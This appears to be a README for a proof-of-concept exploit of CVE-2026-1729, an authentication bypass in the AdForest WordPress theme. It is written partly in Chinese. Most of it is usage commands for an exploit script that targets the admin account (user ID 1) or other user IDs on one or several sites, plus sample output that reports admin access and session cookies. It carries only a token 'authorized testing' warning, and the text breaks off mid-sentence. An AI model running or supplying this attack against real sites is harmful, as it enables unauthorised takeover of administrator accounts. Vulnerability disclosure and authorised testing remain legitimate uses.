
用于 WordPress 的 AdForest 主题在所有版本(包括 6.0.12)中均存在身份验证绕过漏洞。这是由于插件在通过 'sb_login_user_with_otp_fun' 函数对用户进行身份验证之前,未能正确验证用户身份。这使得未经身份验证的攻击者能够登录,包括管理员账户。
针对 CVE-2026-1729(PoC)的简易概念验证 - AdForest WordPress 主题中的认证绕过漏洞。 由 f3ds cr3w est 2oo2 编写 博客
requests 库pip install requests
python poc/exploit.py https://target-site.com
python poc/exploit.py https://target-site.com --user-id 2
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com
# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5
# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin
🎯 Exploit completed successfully!
You now have admin access to the WordPress site.
/wp-admin/ 的完全管理员访问权限如果利用失败: